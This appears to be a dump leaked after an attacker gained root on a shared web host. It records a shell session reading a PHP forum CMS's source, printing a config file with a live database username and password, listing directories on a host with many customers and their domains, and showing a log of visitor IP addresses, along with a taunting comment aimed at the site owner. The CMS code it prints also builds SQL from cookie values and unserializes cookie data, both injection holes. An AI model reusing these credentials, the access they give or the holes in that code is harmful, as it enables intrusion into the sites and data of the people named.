- }
- if($config['forum']['auto_lock']){
- //Auto Lock Thread Timer
- $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
- '', 1);
- $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
- <= $ex", 1);
- }
- $_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
- expire < ".time()."");
- $_cache->generate_upermissions_cache();
- $_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
- FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
- $_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
- FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
- //$_cache->generate_cache("module_permissions_db",
- "cache_module_permissions.php", "SELECT * FROM
- ".$config['db']['prefix']."module_permissions");
- }
- if($weekly_cron){
- $_sql->record_message('Weekly CRON is running');
- if(!$stat_cache){
- $_cache->generate_statistics_cache();
- $stat_cache = true;
- }
- $_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
- ".$config['db']['prefix']."config");
- $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
- FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");
- //Optimise all of the tables in the DB
- $alltables = $_sql->getTable("SHOW TABLES");
- $tables = '';
- $counter = count($alltables);
- $x = 0;
- $add = ", ";
- foreach($alltables as $table){
- foreach ($table as $tablename){
- if($x == ($counter-1)){
- $add = '';
- }
- $tables .= "`$tablename`$add";
- $x++;
- }
- }
- $_sql->query("OPTIMIZE TABLE $tables");
- $_sql->updateRow("statistics", array('value' => time()), "variable
- = 'weekly_time'", FALSE);
- }
- if($weekly_cron || $daily_cron || $hourly_cron){
- define('FILE_MERGE', 1);
- include($cms_root.'merge.php');
- }
- }
- /////////////////////////////////////////////////////////////////////////////
- //--Cron.php---------------------------------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- /////////////////////////////////////////////////////////////////////////////
- //--Check weather the site is closed---------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
- if (!$_user->check_permissions($config['global']['user']['id'],
- ADMIN)){
- die(die_error(4));
- :
- }
- }
- /////////////////////////////////////////////////////////////////////////////
- //--Check weather a user is banned-----------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- /**
- if ($config['bans'] != NULL){
- foreach ($config['bans'] as $bans){
- if ($bans['user_ip'] == $config['global']['ip']){
- die(die_error($bans['die']));
- }
- }
- }
- **/
- /////////////////////////////////////////////////////////////////////////////
- //--Sort out the guests & users online stuff-------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- //include($cms_root.'core/usertracker.php');
- /////////////////////////////////////////////////////////////////////////////
- //--UserTracker.php--------------------------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- if(!defined('NO_DB') && !defined('NO_LOG')){
- if(!isset($_SESSION['user']['userkey'])){
- //cookie check
- if(!$_user->is_online){
- if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
- !empty($_COOKIE[$config['db']['ckefix'].'login'])){
- $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
- if(isset($cookie[1]) && (int)isset($cookie[0])){
- if($cookie[1] ==
- $_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
- if($config['login']['autologinIpRestriction']) $aq
- = " AND user_ip = '".getIP()."'";
- $query = $_sql->getTable("SELECT uid FROM
- ".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
- = '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
- if (count($query) == 1){
- $user = $_sql->getTable("SELECT timestamp
- FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
- if($user!==NULL){
- $user = $user[0];
- $_sess->set_sessions($cookie[0]);
- $_SESSION['user']['last_visit']
- = $user['timestamp'];
- $_user->new_user($cookie[0], 'alogin');
- if($_user->get_new_threads($_SESSION['user']['last_visit']))
- setNotification('We have just updated your
- forum icons to reflect new posts.', 'Forum Icons Updated', false,
- $_SESSION['user']['id']);
- $config['global']['user']['id'] =
- $_SESSION['user']['id'];
- }
- }else{//if count query == 1
- setcookie($config['db']['ckefix']."login",
- null, time() - 31536000); //set cookie to remember me
- unset($_COOKIE[$config['db']['ckefix']."login"]);
- }
- }else{ //if cookie == http user agent
- setcookie($config['db']['ckefix']."login",
- null, time() - 31536000); //set cookie to remember me
- unset($_COOKIE[$config['db']['ckefix']."login"]);
- }
- }else{//if cookie info == valid
- setcookie($config['db']['ckefix']."login", null, time()
- - 31536000); //set cookie to remember me
- unset($_COOKIE[$config['db']['ckefix']."login"]);
- }
- redirect($_SERVER["PHP_SELF"]);
- }
- }
- $_user->new_user($config['global']['user']['id']);
- }else{
- $return = $_user->update_location();
- if($return == 0){
- $_user->new_user($config['global']['user']['id']);
- }
- }
- }
- /////////////////////////////////////////////////////////////////////////////
- //--UserTracker.php--------------------------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- /**
- * Thanks to Jesus for this baby, this will add the level of sanitation
- required for the diffrent data types
- */
- function secureit($string, $type=''){
- switch($type){
- case 'post':
- $string = mysql_real_escape_string($string);
- break;
- default:
- $string = mysql_real_escape_string($string);
- $string = htmlentities($string);
- $string = stripslashes($string);
- $string = strip_tags($string);
- break;
- }
- return $string;
- }
- if (isset($_GET['code']) &&
- $_user->check_permissions($config['global']['user']['id'], DEV)) {
- $explode = explode('/', $_SERVER['PHP_SELF']);
- die(highlight_file($explode[count($explode)-1], 1));
- }
- ?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
- core]# less Gre.php
- <?php
- /*======================================================================*\
- | Cybershade CMS - Your CMS, Your Way. |
- \*======================================================================*/
- if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
- error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
- define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
- //this is to start the generation timer off
- $gen_time = microtime();
- //Include the session stuff
- if(!SMODE) require($cms_root."core/classes/class.session.php");
- if(SMODE) require($cms_root."core/classes/classes.php");
- $_sess = new session;
- //Set the headers
- header("Cache-control: private");
- header("Content-Type: text/html; charset=utf-8");
- //ob_start("ob_gzhandler");
- /////////////////////////////////////////////////////////////////////////////
- //--Include the core CMS files needed -------------------------------------//
- core.php
- /////////////////////////////////////////////////////////////////////////////
- :
- ://The config files
- :require($cms_root."core/config.php");
- :
- :/*this is the ultimate cache-er xD, k so basically u got
- : * the var below which "allows" the static cacher through
- : */
- :
- :#$allow = true;
- :
- ://this little switch decided what should be auto cache'd
- :/*switch(CMS_MENU){
- : case 'forum': $allow = false; break;
- : case 'admin': $allow = false; break;
- : case 'ucp': $allow = false; break;
- : case 'login': $allow = false; break;
- : case 'main': $allow = false; break;
- : case 'pm': $allow = false; break;
- : default: $allow = true; break;
- :}
- :
- :if($allow){
- : // Get the modification date of this PHP file
- : $timestamps = array(@getlastmod());
- :
- : // The latest of these modification dates is our real Last-Modified date
- : $timestamp = max($timestamps);
- :
- : // Note that this is not a RFC 822 date (the tz is always GMT)
- : $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
- :
- : // Check if the client has the same page cached
- : if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
- : ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
- : header("HTTP/1.1 304 Not Modified");
- : exit();
- : }
- : // Inform the user what is our last modification date
- : else {
- : header("Last-Modified: " . $tsstring);
- : }
- :}*/
- :
- ://The class files
- :require($cms_root."core/classes/class.sql.php");
- :if(!SMODE)require($cms_root."core/classes/class.login.php");
- :if(!SMODE)require($cms_root."core/classes/class.user.php");
- :if(!SMODE)require($cms_root."core/classes/class.form.php");
- :if(!SMODE)require($cms_root."core/classes/class.time.php");
- :require($cms_root."core/classes/class.nbbc.php");
- :require($cms_root."core/classes/class.tpl.php");
- :if(!SMODE)require($cms_root."core/classes/class.cache.php");
- :require($cms_root."core/classes/class.geshi.php");
- :
- ://The base functions
- :require($cms_root."core/base_functions.php");
- :
- ://///////////////////////////////////////////////////////////////////////////
- ://--Sort out the cached config stuff---------------------------------------//
- ://///////////////////////////////////////////////////////////////////////////
- :$config_db = array();
- ://check see if the config file exists, if not then just create a blank config
- va
- :riable
- :if(file_exists($cms_root."cache/cache_config.php")){ include
- $cms_root."cache/ca
- :che_config.php"; }
- :
- ://If the config_db is not null, cached.. then use it.
- :if($config_db !== NULL){
- : foreach($config_db as $array){
- : $config[$array['array']][$array['var']] = $array['value'];
- : }
- : unset($array);
- :}
- :
- :if(isset($_GET['_site'])){
- : $a=(isset($_GET['_site']) ? $_GET['_site'] :
- (isset($_SESSION['site']['mode'
- :]) ? $_SESSION['site']['mode'] : $config['db']['prefix']));
- : switch($a){
- : case 'dmz':
- : $_SESSION['site']['mode'] = 'dmz_';
- : break;
- : case 'cs':
- : $_SESSION['site']['mode'] = 'cs_';
- : break;
- : default:
- : }
- :}
- :if(isset($_SESSION['site']['mode']))
- : $config['db']['prefix'] = $_SESSION['site']['mode'];
- :
- ://///////////////////////////////////////////////////////////////////////////
- ://--Define new instances of required classes-------------------------------//
- ://///////////////////////////////////////////////////////////////////////////
- ://start the sql
- :$_sql = new sql(true);
- :$_sql->config = $config;
- :if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
- :if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
- :
- :
- ://Open the session stuff
- :$_sess->sql = $_sql;
- :$_sess->config = $config;
- :
- ://start the form class
- :$_form = new form;
- :
- ://start the user class
- :$_user = new user;
- :$_user->config = $config;
- :$_user->sql = $_sql;
- root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/
- # RoMeO's butt buddy xlink aka mad php c0d3r
- root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
- ls -al
- drwxr-xr-x 2 romeo romeo 4096 Dec 23 14:31 .htpasswd
- drwxr-xr-x 2 root root 4096 May 23 00:10 logs
- drwx--x--x 3 romeo romeo 4096 Dec 23 14:31 public_ftp
- drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
- drwxr-xr-x 2 root root 4096 May 1 00:10 stats
- root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
- cd public_html/
- root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
- public_html]# ls -al
- total 1188
- drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 .
- drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 ..
- -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 400.shtml
- -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 401.shtml
- -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 403.shtml
- -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 404.shtml
- -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 500.shtml
- -rw-r--r-- 1 romeo romeo 5254 Feb 16 08:01 acp.php
- -rw-r--r-- 1 romeo romeo 9757 Feb 16 08:01 ajax.php
- -rw-r--r-- 1 romeo romeo 2118 Feb 16 08:01 articles.php
- drwxrwxrwx 5 romeo romeo 4096 Feb 10 19:31 cache
- drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 cgi-bin
- -rw-r--r-- 1 romeo romeo 5561 Feb 16 08:01 challenges.php
- -rw-r--r-- 1 romeo romeo 466963 Mar 1 14:51 cms_docs.zip
- -rw-r--r-- 1 romeo romeo 2137 Feb 10 19:31 codebase.php
- -rw-r--r-- 1 romeo romeo 17251 Feb 10 19:31 convertor.php
- drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 core
- -rw-r--r-- 1 romeo romeo 0 Feb 10 19:31 debug
- -rw-r--r-- 1 romeo romeo 3266 Feb 10 19:31 eg.gif
- -rw-r--r-- 1 romeo romeo 28213 Mar 20 12:59 farm.php
- -rw-r--r-- 1 romeo romeo 5020 Feb 16 08:01 forgotpass.php
- -rw-r--r-- 1 romeo romeo 7097 Feb 19 14:12 forum.php
- -rw-r--r-- 1 romeo romeo 2110 Feb 16 08:01 get_shouts.php
- -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:12 .htaccess
- -rw-r--r-- 1 romeo romeo 36 Feb 10 19:31 .htpasswd
- drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 images
- drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 img
- -rw-r--r-- 1 romeo romeo 3998 Feb 16 08:01 index.php
- -rw-r--r-- 1 romeo romeo 843 Feb 16 08:01 irc.php
- drwxr-xr-x 3 romeo romeo 4096 Feb 10 19:31 language
- -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:12 latest_posts.php
- -rwxr-xr-x 1 romeo romeo 7184 Feb 16 08:01 loader.php
- -rw-r--r-- 1 romeo romeo 8398 Feb 16 08:01 login.php
- -rwxr-xr-x 1 romeo romeo 13954 Feb 10 19:31 logo.jpg
- -rw-r--r-- 1 romeo romeo 3006 Feb 16 08:01 merge.php
- drwxr-xr-x 20 romeo romeo 4096 Feb 17 09:01 modules
- -rw-r--r-- 1 romeo romeo 10964 Feb 16 08:01 pastebin.php
- -rw-r--r-- 1 romeo romeo 35466 Feb 19 14:39 post.php
- -rw-r--r-- 1 romeo romeo 2142 Feb 16 08:01 privatemessages.php
- -rw-r--r-- 1 romeo romeo 9755 Feb 21 09:08 register.php
- -rw-r--r-- 1 romeo romeo 7986 Feb 16 08:01 rss.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 scripts
- -rw-r--r-- 1 romeo romeo 1065 Feb 16 08:01 search.php
- -rw-r--r-- 1 romeo romeo 1838 Feb 16 08:01 settings.php
- drwxr-xr-x 8 romeo romeo 4096 Mar 19 10:13 skin
- -rw-r--r-- 1 romeo romeo 196608 Mar 19 10:20 skin.tgz
- -rw-r--r-- 1 romeo romeo 636 Feb 16 08:01 staff.php
- -rw-r--r-- 1 romeo romeo 133049 May 23 04:00 stress_test.txt
- -rw-r--r-- 1 romeo romeo 994 Feb 10 19:31 swiigle_upload.php
- drwxr-xr-x 5 romeo romeo 4096 Feb 16 19:13 template
- -rw-r--r-- 1 romeo romeo 454 Feb 10 19:31 template.php
- -rw-r--r-- 1 romeo romeo 590 Feb 10 19:31 test.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 txt docs
- -rw-r--r-- 1 romeo romeo 2708 Feb 16 08:01 ucp.php
- -rw-r--r-- 1 romeo romeo 8546 Feb 19 14:12 view_group.php
- -rw-r--r-- 1 romeo romeo 876 Feb 16 08:01 view_profile.php
- -rw-r--r-- 1 romeo romeo 12838 Feb 19 14:12 view_topic.php
- -rw-r--r-- 1 romeo romeo 9571 Feb 16 08:01 windowed_options.php
- root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
- public_html]# cd core
- root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
- core]# ls -al
- total 164
- drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 .
- drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 ..
- -rw-r--r-- 1 romeo romeo 731 Feb 10 19:31 admin.js
- -rw-r--r-- 1 romeo romeo 27175 Feb 16 19:00 base_functions.php
- -rw-r--r-- 1 romeo romeo 9266 Feb 16 19:00 bbcode_tags.php
- -rw-r--r-- 1 romeo romeo 2816 Feb 10 19:31 cacher.php
- drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 classes
- -rw-r--r-- 1 romeo romeo 1376 Feb 16 19:00 cli.php
- -rw-r--r-- 1 romeo romeo 2847 Feb 10 19:33 config.php
- -rw-r--r-- 1 romeo romeo 23727 Feb 17 09:53 core.php
- -rw-r--r-- 1 romeo romeo 4518 Feb 10 19:31 cron.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 err
- -rw-r--r-- 1 romeo romeo 236 Feb 16 19:00 force_user.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 functions
- -rw-r--r-- 1 romeo romeo 1181 Feb 16 19:00 key.php
- -rw-r--r-- 1 romeo romeo 6903 Feb 16 19:00 mailer.php
- drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 mint
- -rw-r--r-- 1 romeo romeo 3054 Feb 16 19:00 page_footer.php
- -rw-r--r-- 1 romeo romeo 6429 Feb 16 19:00 page_header.php
- -rw-r--r-- 1 romeo romeo 9762 Feb 16 19:00 recaptchalib.php
- -rw-r--r-- 1 romeo romeo 6601 Apr 5 12:58 security.php
- -rw-r--r-- 1 romeo romeo 2760 Feb 16 19:00 usertracker.php
- root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
- core]# less config.php
- <?php
- //Cybershade.Org
- //Database Stuff
- $config['db']['host'] = 'localhost';
- $config['db']['username'] = 'romeo_romeo';
- $config['db']['password'] = 'swU55ath';
- $config['db']['database'] = 'romeo_DMZ_CS';
- $config['db']['prefix'] = 'cs_';
- $config['db']['shrfix'] = 'shr_'; //the prefix
- f
- or the shared tables
- $config['db']['ckefix'] = 'CMS_'; //the cookie prefix
- $config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
- is also a good way to invalidate the autologins on cms update
- $config['site']['working_dir'] = '';
- //config vars for if we loose the DB
- $config['cms']['name'] = 'DarkMindZ';
- $config['cms']['version'] = '_DDoS';
- $config['cms']['debug'] = "0";
- $config['site']['title'] = 'CyberShade CMS';
- $config['site']['theme'] = 'cs';
- $config['site']['language'] = 'en';
- root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
- public_html]# less stress_test.txt
- /codebase/perl-2.html - 74.6.17.162 - Queries: 26 - SQLTime: 68.93934 -
- PAGETime
- r: -0.83011 |
- /register.php - 89.149.254.135 - Queries: 5 - SQLTime: 10.82445 - PAGETimer:
- 0.2
- 6816 |
- /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.93658 - PAGETimer:
- 0.1065
- 6 |
- /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.43613 - PAGETimer:
- 0.0528
- 6 |
- /index.php - 89.149.254.135 - Queries: 8 - SQLTime: 30.80612 - PAGETimer:
- 0.0420
- 1 |
- /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 12.93695 - PAGETimer:
- 0.0522
- 9 |
- /index.php - 89.149.254.135 - Queries: 8 - SQLTime: 14.52338 - PAGETimer:
- 0.0435
- 5 |
- /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 14.55832 - PAGETimer:
- 0.0514
- 6 |
- /forum/post.php?mode=lock_thread&id=5559 - 74.6.17.162 - Queries: 10 - SQLTime:
- 30.93873 - PAGETimer: 0.2404 |
- /forum/thread5853.html - 66.249.70.100 - Queries: 18 - SQLTime: 41.73033 -
- PAGET
- imer: 0.09753 |
- /codebase/mailform-asp-num147.html - 65.55.211.89 - Queries: 9 - SQLTime:
- 13.306
- 77 - PAGETimer: 0.11182 |
- / - 216.80.92.36 - Queries: 8 - SQLTime: 21.05451 - PAGETimer: 0.05534 |
- root@server2:~[root@server2 ~]# cd /home
- root@server2:/home[root@server2 home]# ls -la
- total 152
- drwx--x--x 36 root root 4096 May 23 02:33 .
- drwx--x--x 25 root root 4096 May 22 09:26 ..
- drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 aaa
- drwx--x--x 6 admin admin 4096 Jan 12 14:29 admin
- drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 beyond
- drwx--x--x 4 bloo bloo 4096 May 23 02:04 bloo
- drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 bootroot
- drwx------ 2 clamav clamav 4096 Apr 1 22:35 clamav
- drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 dablitz
- drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 dakilla
- drwxr-xr-x 2 root root 4096 Dec 3 2007 ftp
- drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 furiogamin
- drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 h3mod
- drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 haiobr
- drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 hbxmike
- drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 hotglow
- drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 hrdev
- drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 hstrike
- drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 kaza
- drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 keytraderz
- drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 mrgod
- drwx--x--x 5 odin odin 4096 May 8 05:01 odin
- drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 pagewiz
- drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 penguin
- drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 pimpinjg
- drwx--x--x 5 ristop ristop 4096 May 22 15:33 ristop
- drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 romeo
- drwx--x--x 4 sam sam 4096 May 12 09:26 sam
- drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 scraft758
- drwx------ 2 546 547 4096 May 23 02:33 test
- drwxrwxrwt 2 root root 4096 May 23 03:36 tmp
- drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 wheelglow
- drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 wtfsmilez
- drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 xckx
- drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 yourkicks
- drwx--x--x 5 zer0 zer0 4096 May 23 01:28 zer0
- root@server2:/home/zer0/domains[root@server2 domains]# ls -la /home/*/domains/
- /home/aaa/domains/:
- total 12
- drwx--x--x 3 aaa aaa 4096 Sep 14 2007 .
- drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 ..
- drwx--x--x 8 aaa aaa 4096 Sep 14 2007 aaasoda.com
- /home/admin/domains/:
- total 20
- drwx--x--x 5 admin admin 4096 Jan 12 14:29 .
- drwx--x--x 6 admin admin 4096 Jan 12 14:29 ..
- drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 default
- drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 sharedip
- drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 suspended
- /home/beyond/domains/:
- total 12
- drwx--x--x 3 beyond beyond 4096 Sep 12 2007 .
- drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 ..
- drwx--x--x 8 beyond beyond 4096 Feb 6 2008 beyond-comparison.com
- /home/bloo/domains/:
- total 12
- drwx--x--x 3 bloo bloo 4096 May 23 02:04 .
- drwx--x--x 4 bloo bloo 4096 May 23 02:04 ..
- drwx--x--x 6 bloo bloo 4096 May 23 02:04 bloohacks.com
- /home/bootroot/domains/:
- total 20
- drwx--x--x 5 bootroot bootroot 4096 May 12 21:27 .
- drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 ..
- drwx--x--x 8 bootroot bootroot 4096 May 9 18:57 bootforfun.com
- drwx--x--x 7 bootroot bootroot 4096 Mar 2 00:11 bootforfun.net
- drwx--x--x 7 bootroot bootroot 4096 May 13 00:10 bootforfun.org
- /home/dablitz/domains/:
- total 16
- drwx--x--x 4 dablitz dablitz 4096 Jan 3 23:34 .
- drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 ..
- drwx--x--x 8 dablitz dablitz 4096 Jan 17 10:32 blitzcraze.com
- drwx--x--x 8 dablitz dablitz 4096 Jan 24 07:14 blitzdownloads.com
- /home/dakilla/domains/:
- total 12
- drwxr-xr-x 3 dakilla dakilla 4096 May 16 07:49 .
- drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 ..
- drwxr-xr-x 8 dakilla dakilla 4096 Feb 15 00:11 scionbot.com
- /home/furiogamin/domains/:
- total 20
- drwx--x--x 5 furiogamin furiogamin 4096 Feb 19 06:57 .
- drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 ..
- drwx--x--x 8 furiogamin furiogamin 4096 Feb 18 11:04 furiogaming.com
- drwx--x--x 7 furiogamin furiogamin 4096 Dec 27 21:11 furiogaming.net
- drwx--x--x 5 furiogamin furiogamin 4096 Apr 10 13:14 softmodding.net
- /home/h3mod/domains/:
- total 12
- drwx--x--x 3 h3mod h3mod 4096 Jan 18 2008 .
- drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 ..
- drwx--x--x 8 h3mod h3mod 4096 Oct 2 2008 h3mod.com
- /home/haiobr/domains/:
- total 12
- drwxr-xr-x 3 haiobr haiobr 4096 May 1 14:26 .
- drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 ..
- drwxr-xr-x 9 haiobr haiobr 4096 May 1 14:26 super-syn.net
- /home/hbxmike/domains/:
- total 16
- drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 .
- drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 ..
- drwx--x--x 7 hbxmike hbxmike 4096 May 12 00:11 hackordie.net
- drwx--x--x 8 hbxmike hbxmike 4096 Apr 29 00:10 wesellstuff.biz
- /home/hotglow/domains/:
- total 12
- drwxr-xr-x 3 hotglow hotglow 4096 Sep 3 2007 .
- drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 ..
- drwxr-xr-x 8 hotglow hotglow 4096 Sep 3 2007 hotglowneon.com
- /home/hrdev/domains/:
- total 12
- drwxr-xr-x 3 hrdev hrdev 4096 Dec 2 19:31 .
- drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 ..
- drwxr-xr-x 8 hrdev hrdev 4096 Dec 10 2007 hr-development.net
- /home/hstrike/domains/:
- total 12
- drwx--x--x 3 hstrike hstrike 4096 Apr 24 2008 .
- drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 ..
- drwx--x--x 8 hstrike hstrike 4096 Oct 31 2008 halostrike.com
- /home/kaza/domains/:
- total 28
- drwx--x--x 7 kaza kaza 4096 Apr 25 15:46 .
- drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 ..
- drwx--x--x 7 kaza kaza 4096 Jan 6 21:14 crypticgamers.com
- drwx--x--x 7 kaza kaza 4096 Jan 5 21:13 crypticgamers.net
- drwx--x--x 7 kaza kaza 4096 Jan 15 21:12 godlymods.com
- drwx--x--x 7 kaza kaza 4096 May 4 08:50 kindclan.co.cc
- drwx--x--x 7 kaza kaza 4096 Feb 4 00:10 mortonnetworks.com
- /home/keytraderz/domains/:
- total 20
- drwx--x--x 5 keytraderz keytraderz 4096 Jan 18 21:18 .
- drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 ..
- drwx--x--x 8 keytraderz keytraderz 4096 Jan 5 21:20 1nesolution.com
- drwx--x--x 8 keytraderz keytraderz 4096 Jan 13 21:16 gotmovies.net
- drwx--x--x 8 keytraderz keytraderz 4096 Jan 2 21:15 keytraderz.com
- /home/mrgod/domains/:
- total 12
- drwx--x--x 3 mrgod mrgod 4096 May 14 19:46 .
- drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 ..
- drwx--x--x 7 mrgod mrgod 4096 May 15 00:11 international-gaming.net
- /home/odin/domains/:
- total 12
- drwx--x--x 3 odin odin 4096 May 2 04:09 .
- drwx--x--x 5 odin odin 4096 May 8 05:01 ..
- drwx--x--x 7 odin odin 4096 May 15 08:14 evilzone.ws
- /home/pagewiz/domains/:
- total 12
- drwx--x--x 3 pagewiz pagewiz 4096 May 18 18:08 .
- drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 ..
- drwx--x--x 8 pagewiz pagewiz 4096 May 19 00:10 pagewizzstudio.com
- /home/penguin/domains/:
- total 12
- drwx--x--x 3 penguin penguin 4096 Dec 20 11:24 .
- drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 ..
- drwx--x--x 7 penguin penguin 4096 Dec 20 21:12 phylumstudios.com
- /home/pimpinjg/domains/:
- total 16
- drwx--x--x 4 pimpinjg pimpinjg 4096 Mar 26 16:13 .
- drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 ..
- drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 26 16:13 h4ckinab0x.com
- drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 27 00:11 teamhbx.com
- /home/ristop/domains/:
- total 12
- drwx--x--x 3 ristop ristop 4096 May 22 13:33 .
- drwx--x--x 5 ristop ristop 4096 May 22 15:33 ..
- drwx--x--x 8 ristop ristop 4096 May 23 00:10 centosservers.com
- /home/romeo/domains/:
- total 16
- drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
- drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
- drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
- drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
- /home/sam/domains/:
- total 12
- drwx--x--x 3 sam sam 4096 May 12 09:00 .
- drwx--x--x 4 sam sam 4096 May 12 09:26 ..
- drwx--x--x 8 sam sam 4096 May 13 00:11 metus-project.com
- /home/scraft758/domains/:
- total 24
- drwx--x--x 6 scraft758 scraft758 4096 Apr 16 20:03 .
- drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 ..
- drwx--x--x 7 scraft758 scraft758 4096 Jan 27 21:12 mods4hire.com
- drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.com
- drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.net
- drwx--x--x 7 scraft758 scraft758 4096 Oct 28 2008 theconsolejunkies.com
- /home/wheelglow/domains/:
- total 12
